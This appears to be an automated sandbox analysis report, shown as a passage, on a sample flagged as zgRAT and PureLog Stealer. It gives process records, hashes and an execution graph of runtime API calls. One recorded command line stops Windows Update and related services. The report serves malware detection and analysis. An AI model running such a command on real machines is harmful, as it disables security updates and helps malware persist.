                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:80
                                                                                                  Start time:18:07:22
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:tree /A /F
                                                                                                  Imagebase:0x7ff768f20000
                                                                                                  File size:20'992 bytes
                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:81
                                                                                                  Start time:18:07:22
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:82
                                                                                                  Start time:18:07:22
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:85
                                                                                                  Start time:18:07:23
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:tree /A /F
                                                                                                  Imagebase:0x7ff768f20000
                                                                                                  File size:20'992 bytes
                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:86
                                                                                                  Start time:18:07:23
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
                                                                                                  Imagebase:0xa50000
                                                                                                  File size:3'720'704 bytes
                                                                                                  MD5 hash:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 92%, ReversingLabs
                                                                                                  Has exited:true

                                                                                                  Target ID:87
                                                                                                  Start time:18:07:23
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
                                                                                                  Imagebase:0x810000
                                                                                                  File size:3'720'704 bytes
                                                                                                  MD5 hash:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:91
                                                                                                  Start time:18:07:23
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:92
                                                                                                  Start time:18:07:23
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:144
                                                                                                  Start time:18:07:42
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:187
                                                                                                  Start time:18:08:00
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Target ID:192
                                                                                                  Start time:18:08:01
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                  Wow64 process (32bit):
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:
                                                                                                  Has administrator privileges:
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:9.6%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:19.2%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:35
                                                                                                    execution_graph 19683 7ff7691c09c0 19694 7ff7691c66f4 19683->19694 19695 7ff7691c6701 19694->19695 19696 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19695->19696 19697 7ff7691c671d 19695->19697 19696->19695 19698 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19697->19698 19699 7ff7691c09c9 19697->19699 19698->19697 19700 7ff7691bf5e8 EnterCriticalSection 19699->19700 16693 7ff7691b4938 16694 7ff7691b4952 16693->16694 16695 7ff7691b496f 16693->16695 16718 7ff7691b43d4 16694->16718 16695->16694 16697 7ff7691b4982 CreateFileW 16695->16697 16699 7ff7691b49b6 16697->16699 16700 7ff7691b49ec 16697->16700 16721 7ff7691b4a8c GetFileType 16699->16721 16747 7ff7691b4f14 16700->16747 16701 7ff7691b43f4 _set_fmode 11 API calls 16704 7ff7691b495f 16701->16704 16709 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16704->16709 16707 7ff7691b4a20 16768 7ff7691b4cd4 16707->16768 16708 7ff7691b49f5 16712 7ff7691b4368 _fread_nolock 11 API calls 16708->16712 16714 7ff7691b496a 16709->16714 16710 7ff7691b49e1 CloseHandle 16710->16714 16711 7ff7691b49cb CloseHandle 16711->16714 16717 7ff7691b49ff 16712->16717 16717->16714 16719 7ff7691ba5d8 _set_fmode 11 API calls 16718->16719 16720 7ff7691b43dd 16719->16720 16720->16701 16722 7ff7691b4b97 16721->16722 16726 7ff7691b4ada 16721->16726 16723 7ff7691b4bc1 16722->16723 16724 7ff7691b4b9f 16722->16724 16731 7ff7691b4be4 PeekNamedPipe 16723->16731 16746 7ff7691b4b82 16723->16746 16728 7ff7691b4bb2 GetLastError 16724->16728 16729 7ff7691b4ba3 16724->16729 16725 7ff7691b4b06 GetFileInformationByHandle 16725->16728 16730 7ff7691b4b2f 16725->16730 16726->16725 16727 7ff7691b4e10 21 API calls 16726->16727 16732 7ff7691b4af4 16727->16732 16735 7ff7691b4368 _fread_nolock 11 API calls 16728->16735 16733 7ff7691b43f4 _set_fmode 11 API calls 16729->16733 16734 7ff7691b4cd4 51 API calls 16730->16734 16731->16746 16732->16725 16732->16746 16733->16746 16737 7ff7691b4b3a 16734->16737 16735->16746 16736 7ff7691ab870 _log10_special 8 API calls 16738 7ff7691b49c4 16736->16738 16785 7ff7691b4c34 16737->16785 16738->16710 16738->16711 16741 7ff7691b4c34 10 API calls 16742 7ff7691b4b59 16741->16742 16743 7ff7691b4c34 10 API calls 16742->16743 16744 7ff7691b4b6a 16743->16744 16745 7ff7691b43f4 _set_fmode 11 API calls 16744->16745 16744->16746 16745->16746 16746->16736 16748 7ff7691b4f4a 16747->16748 16749 7ff7691b43f4 _set_fmode 11 API calls 16748->16749 16767 7ff7691b4fe2 __std_exception_copy 16748->16767 16751 7ff7691b4f5c 16749->16751 16750 7ff7691ab870 _log10_special 8 API calls 16752 7ff7691b49f1 16750->16752 16753 7ff7691b43f4 _set_fmode 11 API calls 16751->16753 16752->16707 16752->16708 16754 7ff7691b4f64 16753->16754 16792 7ff7691b7118 16754->16792 16756 7ff7691b4f79 16757 7ff7691b4f81 16756->16757 16758 7ff7691b4f8b 16756->16758 16759 7ff7691b43f4 _set_fmode 11 API calls 16757->16759 16760 7ff7691b43f4 _set_fmode 11 API calls 16758->16760 16764 7ff7691b4f86 16759->16764 16761 7ff7691b4f90 16760->16761 16762 7ff7691b43f4 _set_fmode 11 API calls 16761->16762 16761->16767 16763 7ff7691b4f9a 16762->16763 16765 7ff7691b7118 45 API calls 16763->16765 16766 7ff7691b4fd4 GetDriveTypeW 16764->16766 16764->16767 16765->16764 16766->16767 16767->16750 16770 7ff7691b4cfc 16768->16770 16769 7ff7691b4a2d 16778 7ff7691b4e10 16769->16778 16770->16769 16886 7ff7691bea34 16770->16886 16772 7ff7691b4d90 16772->16769 16773 7ff7691bea34 51 API calls 16772->16773 16774 7ff7691b4da3 16773->16774 16774->16769 16775 7ff7691bea34 51 API calls 16774->16775 16776 7ff7691b4db6 16775->16776 16776->16769 16777 7ff7691bea34 51 API calls 16776->16777 16777->16769 16779 7ff7691b4e2a 16778->16779 16780 7ff7691b4e61 16779->16780 16781 7ff7691b4e3a 16779->16781 16782 7ff7691be8c8 21 API calls 16780->16782 16783 7ff7691b4e4a 16781->16783 16784 7ff7691b4368 _fread_nolock 11 API calls 16781->16784 16782->16783 16783->16717 16784->16783 16786 7ff7691b4c50 16785->16786 16787 7ff7691b4c5d FileTimeToSystemTime 16785->16787 16786->16787 16789 7ff7691b4c58 16786->16789 16788 7ff7691b4c71 SystemTimeToTzSpecificLocalTime 16787->16788 16787->16789 16788->16789 16790 7ff7691ab870 _log10_special 8 API calls 16789->16790 16791 7ff7691b4b49 16790->16791 16791->16741 16793 7ff7691b71a2 16792->16793 16794 7ff7691b7134 16792->16794 16829 7ff7691bfad0 16793->16829 16794->16793 16796 7ff7691b7139 16794->16796 16797 7ff7691b7151 16796->16797 16798 7ff7691b716e 16796->16798 16804 7ff7691b6ee8 GetFullPathNameW 16797->16804 16812 7ff7691b6f5c GetFullPathNameW 16798->16812 16803 7ff7691b7166 __std_exception_copy 16803->16756 16805 7ff7691b6f24 16804->16805 16806 7ff7691b6f0e GetLastError 16804->16806 16809 7ff7691b43f4 _set_fmode 11 API calls 16805->16809 16811 7ff7691b6f20 16805->16811 16807 7ff7691b4368 _fread_nolock 11 API calls 16806->16807 16808 7ff7691b6f1b 16807->16808 16810 7ff7691b43f4 _set_fmode 11 API calls 16808->16810 16809->16811 16810->16811 16811->16803 16813 7ff7691b6f8f GetLastError 16812->16813 16817 7ff7691b6fa5 __std_exception_copy 16812->16817 16814 7ff7691b4368 _fread_nolock 11 API calls 16813->16814 16815 7ff7691b6f9c 16814->16815 16816 7ff7691b43f4 _set_fmode 11 API calls 16815->16816 16818 7ff7691b6fa1 16816->16818 16817->16818 16819 7ff7691b6fff GetFullPathNameW 16817->16819 16820 7ff7691b7034 16818->16820 16819->16813 16819->16818 16824 7ff7691b70a8 memcpy_s 16820->16824 16825 7ff7691b705d __scrt_get_show_window_mode 16820->16825 16821 7ff7691b7091 16822 7ff7691b43f4 _set_fmode 11 API calls 16821->16822 16823 7ff7691b7096 16822->16823 16827 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16823->16827 16824->16803 16825->16821 16825->16824 16826 7ff7691b70ca 16825->16826 16826->16824 16828 7ff7691b43f4 _set_fmode 11 API calls 16826->16828 16827->16824 16828->16823 16832 7ff7691bf8e0 16829->16832 16833 7ff7691bf922 16832->16833 16834 7ff7691bf90b 16832->16834 16836 7ff7691bf926 16833->16836 16837 7ff7691bf947 16833->16837 16835 7ff7691b43f4 _set_fmode 11 API calls 16834->16835 16839 7ff7691bf910 16835->16839 16858 7ff7691bfa4c 16836->16858 16870 7ff7691be8c8 16837->16870 16843 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16839->16843 16841 7ff7691bf94c 16846 7ff7691bf9f1 16841->16846 16853 7ff7691bf973 16841->16853 16857 7ff7691bf91b __std_exception_copy 16843->16857 16844 7ff7691bf92f 16845 7ff7691b43d4 _fread_nolock 11 API calls 16844->16845 16847 7ff7691bf934 16845->16847 16846->16834 16849 7ff7691bf9f9 16846->16849 16848 7ff7691b43f4 _set_fmode 11 API calls 16847->16848 16848->16839 16852 7ff7691b6ee8 13 API calls 16849->16852 16850 7ff7691ab870 _log10_special 8 API calls 16851 7ff7691bfa41 16850->16851 16851->16803 16852->16857 16854 7ff7691b6f5c 14 API calls 16853->16854 16855 7ff7691bf9b7 16854->16855 16856 7ff7691b7034 37 API calls 16855->16856 16855->16857 16856->16857 16857->16850 16859 7ff7691bfa96 16858->16859 16860 7ff7691bfa66 16858->16860 16862 7ff7691bfaa1 GetDriveTypeW 16859->16862 16863 7ff7691bfa81 16859->16863 16861 7ff7691b43d4 _fread_nolock 11 API calls 16860->16861 16864 7ff7691bfa6b 16861->16864 16862->16863 16866 7ff7691ab870 _log10_special 8 API calls 16863->16866 16865 7ff7691b43f4 _set_fmode 11 API calls 16864->16865 16867 7ff7691bfa76 16865->16867 16868 7ff7691bf92b 16866->16868 16869 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16867->16869 16868->16841 16868->16844 16869->16863 16884 7ff7691c97e0 16870->16884 16873 7ff7691be93c 16875 7ff7691bdea8 _set_fmode 11 API calls 16873->16875 16874 7ff7691be915 16876 7ff7691ab870 _log10_special 8 API calls 16874->16876 16877 7ff7691be94b 16875->16877 16878 7ff7691be9a9 16876->16878 16879 7ff7691be955 GetCurrentDirectoryW 16877->16879 16880 7ff7691be964 16877->16880 16878->16841 16879->16880 16881 7ff7691be969 16879->16881 16882 7ff7691b43f4 _set_fmode 11 API calls 16880->16882 16883 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16881->16883 16882->16881 16883->16874 16885 7ff7691be8fe GetCurrentDirectoryW 16884->16885 16885->16873 16885->16874 16887 7ff7691bea41 16886->16887 16888 7ff7691bea65 16886->16888 16887->16888 16889 7ff7691bea46 16887->16889 16891 7ff7691bea9f 16888->16891 16892 7ff7691beabe 16888->16892 16890 7ff7691b43f4 _set_fmode 11 API calls 16889->16890 16893 7ff7691bea4b 16890->16893 16894 7ff7691b43f4 _set_fmode 11 API calls 16891->16894 16895 7ff7691b4178 45 API calls 16892->16895 16896 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16893->16896 16897 7ff7691beaa4 16894->16897 16901 7ff7691beacb 16895->16901 16898 7ff7691bea56 16896->16898 16899 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 16897->16899 16898->16772 16900 7ff7691beaaf 16899->16900 16900->16772 16901->16900 16902 7ff7691bf7ec 51 API calls 16901->16902 16902->16901 19332 7ff7691b4720 19333 7ff7691b472b 19332->19333 19341 7ff7691be5b4 19333->19341 19354 7ff7691bf5e8 EnterCriticalSection 19341->19354 19783 7ff7691bec9c 19784 7ff7691bee8e 19783->19784 19786 7ff7691becde _isindst 19783->19786 19785 7ff7691b43f4 _set_fmode 11 API calls 19784->19785 19803 7ff7691bee7e 19785->19803 19786->19784 19789 7ff7691bed5e _isindst 19786->19789 19787 7ff7691ab870 _log10_special 8 API calls 19788 7ff7691beea9 19787->19788 19804 7ff7691c54a4 19789->19804 19794 7ff7691beeba 19796 7ff7691b9c10 _isindst 17 API calls 19794->19796 19798 7ff7691beece 19796->19798 19801 7ff7691bedbb 19801->19803 19829 7ff7691c54e8 19801->19829 19803->19787 19805 7ff7691bed7c 19804->19805 19806 7ff7691c54b3 19804->19806 19811 7ff7691c48a8 19805->19811 19836 7ff7691bf5e8 EnterCriticalSection 19806->19836 19812 7ff7691c48b1 19811->19812 19813 7ff7691bed91 19811->19813 19814 7ff7691b43f4 _set_fmode 11 API calls 19812->19814 19813->19794 19817 7ff7691c48d8 19813->19817 19815 7ff7691c48b6 19814->19815 19816 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 19815->19816 19816->19813 19818 7ff7691c48e1 19817->19818 19819 7ff7691beda2 19817->19819 19820 7ff7691b43f4 _set_fmode 11 API calls 19818->19820 19819->19794 19823 7ff7691c4908 19819->19823 19821 7ff7691c48e6 19820->19821 19822 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 19821->19822 19822->19819 19824 7ff7691c4911 19823->19824 19825 7ff7691bedb3 19823->19825 19826 7ff7691b43f4 _set_fmode 11 API calls 19824->19826 19825->19794 19825->19801 19827 7ff7691c4916 19826->19827 19828 7ff7691b9bf0 _invalid_parameter_noinfo 37 API calls 19827->19828 19828->19825 19837 7ff7691bf5e8 EnterCriticalSection 19829->19837 19387 7ff7691bb830 19398 7ff7691bf5e8 EnterCriticalSection 19387->19398 15755 7ff7691aae00 15756 7ff7691aae2e 15755->15756 15757 7ff7691aae15 15755->15757 15757->15756 15760 7ff7691bc90c 15757->15760 15761 7ff7691bc957 15760->15761 15762 7ff7691bc91b _set_fmode 15760->15762 15770 7ff7691b43f4 15761->15770 15762->15761 15763 7ff7691bc93e RtlAllocateHeap 15762->15763 15767 7ff7691c28a0 15762->15767 15763->15762 15765 7ff7691aae8e 15763->15765 15773 7ff7691c28e0 15767->15773 15779 7ff7691ba5d8 GetLastError 15770->15779 15772 7ff7691b43fd 15772->15765 15778 7ff7691bf5e8 EnterCriticalSection 15773->15778 15780 7ff7691ba619 FlsSetValue 15779->15780 15782 7ff7691ba5fc 15779->15782 15781 7ff7691ba62b 15780->15781 15793 7ff7691ba609 SetLastError 15780->15793 15796 7ff7691bdea8 15781->15796 15782->15780 15782->15793 15786 7ff7691ba658 FlsSetValue 15789 7ff7691ba676 15786->15789 15790 7ff7691ba664 FlsSetValue 15786->15790 15787 7ff7691ba648 FlsSetValue 15788 7ff7691ba651 15787->15788 15803 7ff7691b9c58 15788->15803 15809 7ff7691ba204 15789->15809 15790->15788 15793->15772 15801 7ff7691bdeb9 _set_fmode 15796->15801 15797 7ff7691bdf0a 15800 7ff7691b43f4 _set_fmode 10 API calls 15797->15800 15798 7ff7691bdeee RtlAllocateHeap 15799 7ff7691ba63a 15798->15799 15798->15801 15799->15786 15799->15787 15800->15799 15801->15797 15801->15798 15802 7ff7691c28a0 _set_fmode 2 API calls 15801->15802 15802->15801 15804 7ff7691b9c8c 15803->15804 15805 7ff7691b9c5d RtlDeleteBoundaryDescriptor 15803->15805 15804->15793 15805->15804 15806 7ff7691b9c78 GetLastError 15805->15806 15807 7ff7691b9c85 Concurrency::details::SchedulerProxy::DeleteThis 15806->15807 15808 7ff7691b43f4 _set_fmode 9 API calls 15807->15808 15808->15804 15814 7ff7691ba0dc 15809->15814 15826 7ff7691bf5e8 EnterCriticalSection 15814->15826 15828 7ff7691b8c79 15840 7ff7691b96e8 15828->15840 15845 7ff7691ba460 GetLastError 15840->15845 15846 7ff7691ba4a1 FlsSetValue 15845->15846 15847 7ff7691ba484 FlsGetValue 15845->15847 15848 7ff7691ba4b3 15846->15848 15849 7ff7691ba491 15846->15849 15847->15849 15850 7ff7691ba49b 15847->15850 15852 7ff7691bdea8 _set_fmode 11 API calls 15848->15852 15851 7ff7691ba50d SetLastError 15849->15851 15850->15846 15853 7ff7691b96f1 15851->15853 15854 7ff7691ba52d 15851->15854 15855 7ff7691ba4c2 15852->15855 15867 7ff7691b9814 15853->15867 15856 7ff7691b9814 __CxxCallCatchBlock 38 API calls 15854->15856 15857 7ff7691ba4e0 FlsSetValue 15855->15857 15858 7ff7691ba4d0 FlsSetValue 15855->15858 15859 7ff7691ba532 15856->15859 15861 7ff7691ba4fe 15857->15861 15862 7ff7691ba4ec FlsSetValue 15857->15862 15860 7ff7691ba4d9 15858->15860 15863 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15860->15863 15864 7ff7691ba204 _set_fmode 11 API calls 15861->15864 15862->15860 15863->15849 15865 7ff7691ba506 15864->15865 15866 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15865->15866 15866->15851 15876 7ff7691c2960 15867->15876 15910 7ff7691c2918 15876->15910 15915 7ff7691bf5e8 EnterCriticalSection 15910->15915 19515 7ff7691ca079 19518 7ff7691b4788 LeaveCriticalSection 19515->19518 20148 7ff7691ca10e 20149 7ff7691ca11d 20148->20149 20150 7ff7691ca127 20148->20150 20152 7ff7691bf648 LeaveCriticalSection 20149->20152 19520 7ff7691b9060 19523 7ff7691b8fe4 19520->19523 19530 7ff7691bf5e8 EnterCriticalSection 19523->19530 20153 7ff7691ba2e0 20154 7ff7691ba2e5 20153->20154 20158 7ff7691ba2fa 20153->20158 20159 7ff7691ba300 20154->20159 20160 7ff7691ba342 20159->20160 20161 7ff7691ba34a 20159->20161 20163 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20160->20163 20162 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20161->20162 20164 7ff7691ba357 20162->20164 20163->20161 20165 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20164->20165 20166 7ff7691ba364 20165->20166 20167 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20166->20167 20168 7ff7691ba371 20167->20168 20169 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20168->20169 20170 7ff7691ba37e 20169->20170 20171 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20170->20171 20172 7ff7691ba38b 20171->20172 20173 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20172->20173 20174 7ff7691ba398 20173->20174 20175 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20174->20175 20176 7ff7691ba3a5 20175->20176 20177 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20176->20177 20178 7ff7691ba3b5 20177->20178 20179 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20178->20179 20180 7ff7691ba3c5 20179->20180 20185 7ff7691ba1a4 20180->20185 20199 7ff7691bf5e8 EnterCriticalSection 20185->20199 15980 7ff7691bfbd8 15981 7ff7691bfbfc 15980->15981 15983 7ff7691bfc0c 15980->15983 15982 7ff7691b43f4 _set_fmode 11 API calls 15981->15982 16005 7ff7691bfc01 15982->16005 15984 7ff7691bfeec 15983->15984 15986 7ff7691bfc2e 15983->15986 15985 7ff7691b43f4 _set_fmode 11 API calls 15984->15985 15987 7ff7691bfef1 15985->15987 15988 7ff7691bfc4f 15986->15988 16129 7ff7691c0294 15986->16129 15989 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15987->15989 15991 7ff7691bfcc1 15988->15991 15993 7ff7691bfc75 15988->15993 15997 7ff7691bfcb5 15988->15997 15989->16005 15995 7ff7691bdea8 _set_fmode 11 API calls 15991->15995 16010 7ff7691bfc84 15991->16010 15992 7ff7691bfd6e 16004 7ff7691bfd8b 15992->16004 16011 7ff7691bfddd 15992->16011 16144 7ff7691b89d8 15993->16144 15998 7ff7691bfcd7 15995->15998 15997->15992 15997->16010 16150 7ff7691c643c 15997->16150 16001 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15998->16001 16000 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16000->16005 16006 7ff7691bfce5 16001->16006 16002 7ff7691bfc7f 16007 7ff7691b43f4 _set_fmode 11 API calls 16002->16007 16003 7ff7691bfc9d 16003->15997 16009 7ff7691c0294 45 API calls 16003->16009 16008 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16004->16008 16006->15997 16006->16010 16014 7ff7691bdea8 _set_fmode 11 API calls 16006->16014 16007->16010 16012 7ff7691bfd94 16008->16012 16009->15997 16010->16000 16011->16010 16013 7ff7691c26ec 40 API calls 16011->16013 16021 7ff7691bfd99 16012->16021 16186 7ff7691c26ec 16012->16186 16015 7ff7691bfe1a 16013->16015 16017 7ff7691bfd07 16014->16017 16018 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16015->16018 16023 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16017->16023 16019 7ff7691bfe24 16018->16019 16019->16010 16019->16021 16020 7ff7691bfee0 16025 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16020->16025 16021->16020 16026 7ff7691bdea8 _set_fmode 11 API calls 16021->16026 16022 7ff7691bfdc5 16024 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16022->16024 16023->15997 16024->16021 16025->16005 16027 7ff7691bfe68 16026->16027 16028 7ff7691bfe70 16027->16028 16029 7ff7691bfe79 16027->16029 16030 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16028->16030 16111 7ff7691b97b4 16029->16111 16032 7ff7691bfe77 16030->16032 16038 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16032->16038 16034 7ff7691bfe90 16195 7ff7691c6554 16034->16195 16035 7ff7691bff1b 16037 7ff7691b9c10 _isindst 17 API calls 16035->16037 16040 7ff7691bff2f 16037->16040 16038->16005 16043 7ff7691bff58 16040->16043 16049 7ff7691bff68 16040->16049 16041 7ff7691bfed8 16046 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16041->16046 16042 7ff7691bfeb7 16044 7ff7691b43f4 _set_fmode 11 API calls 16042->16044 16045 7ff7691b43f4 _set_fmode 11 API calls 16043->16045 16047 7ff7691bfebc 16044->16047 16073 7ff7691bff5d 16045->16073 16046->16020 16048 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16047->16048 16048->16032 16050 7ff7691c024b 16049->16050 16052 7ff7691bff8a 16049->16052 16051 7ff7691b43f4 _set_fmode 11 API calls 16050->16051 16054 7ff7691c0250 16051->16054 16053 7ff7691bffa7 16052->16053 16214 7ff7691c037c 16052->16214 16057 7ff7691c001b 16053->16057 16059 7ff7691bffcf 16053->16059 16063 7ff7691c000f 16053->16063 16056 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16054->16056 16056->16073 16061 7ff7691c0043 16057->16061 16064 7ff7691bdea8 _set_fmode 11 API calls 16057->16064 16080 7ff7691bffde 16057->16080 16058 7ff7691c00ce 16072 7ff7691c00eb 16058->16072 16081 7ff7691c013e 16058->16081 16229 7ff7691b8a14 16059->16229 16061->16063 16066 7ff7691bdea8 _set_fmode 11 API calls 16061->16066 16061->16080 16063->16058 16063->16080 16235 7ff7691c62fc 16063->16235 16068 7ff7691c0035 16064->16068 16071 7ff7691c0065 16066->16071 16067 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16067->16073 16074 7ff7691b9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16068->16074 16069 7ff7691bffd9 16075 7ff7691b43f4 _set_fmode 11 API calls 16069->16075 16070 7ff7691bfff7 16070->16063 16079 7ff7691c037c 45 API calls 16070->16079 16076 7ff7691b9c58 